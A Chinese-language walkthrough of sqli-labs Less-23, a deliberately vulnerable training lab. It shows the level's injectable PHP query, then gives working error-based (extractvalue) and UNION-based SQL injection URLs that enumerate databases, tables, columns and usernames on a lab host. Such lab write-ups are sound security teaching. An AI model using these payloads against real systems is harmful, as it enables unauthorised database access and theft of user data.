sqli-labs————less 23（高级注入篇）

前言

从这一关开始，我们进进入了短暂的高级注入部分，这一部分中将会陆续介绍一些更为巧妙的注入技巧。

Less -23

查看一下源代码：

Welcome    Dhakkan 



';	
  	echo 'Your Login name:'. $row['username'];
  	echo "
";
  	echo 'Your Password:' .$row['password'];
  	echo "";
  	}
	else 
	{
	echo '';
	print_r(mysql_error());
	echo "";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
 











 

关键的sql执行语句：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);

从该SQL语句中我们可以看出如果我们要构造payload那么我们需要做的就是闭合前面的单引号、同时闭合后面的单引号。

获取mysql数据库的basedir：

同时，这里也可以使用报错注入、延时注入：

报错注入：

注入语句：

http://192.168.11.136/sqli-labs/Less-23?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

获取数据库信息：

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3

查看数据库security中的数据表：

注入语句：

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3

查看user表中的所有列：

注入语句

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3

获取表中信息内容：

注入语句：

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3

至此，我们完成了一个基本的注入过程。